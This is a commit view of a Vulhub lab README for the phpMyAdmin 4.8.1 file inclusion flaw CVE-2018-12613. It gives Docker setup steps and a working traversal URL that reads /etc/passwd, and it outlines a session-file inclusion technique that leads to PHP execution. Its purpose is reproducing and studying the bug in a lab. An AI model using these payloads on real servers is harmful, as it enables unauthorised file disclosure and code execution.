first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
30
phpmyadmin/CVE-2018-12613/README.md
Normal file
@@ -0,0 +1,30 @@
# phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)
[中文版本(Chinese version)](README.zh-cn.md)
PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. The vulnerability is in the `index.php`, causing files iclusion vulnerabilitiy.
Reference links:
- https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog
- https://www.phpmyadmin.net/security/PMASA-2018-4/
## Setup
Run the following command to start phpmyadmin 4.8.1:
```
docker compose up -d
```
After the environment starts, visit `http://your-ip:8080`. The phpmyadmin is "config" mode, so we can login directly.
## Exploit
Visit `http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`, the result indicates that the file inclusion vulnerability exist:

We can execute `SELECT '<?=phpinfo()?>';`, then check your sessionid (the value of phpMyAdmin in the cookie), and then include the session file:
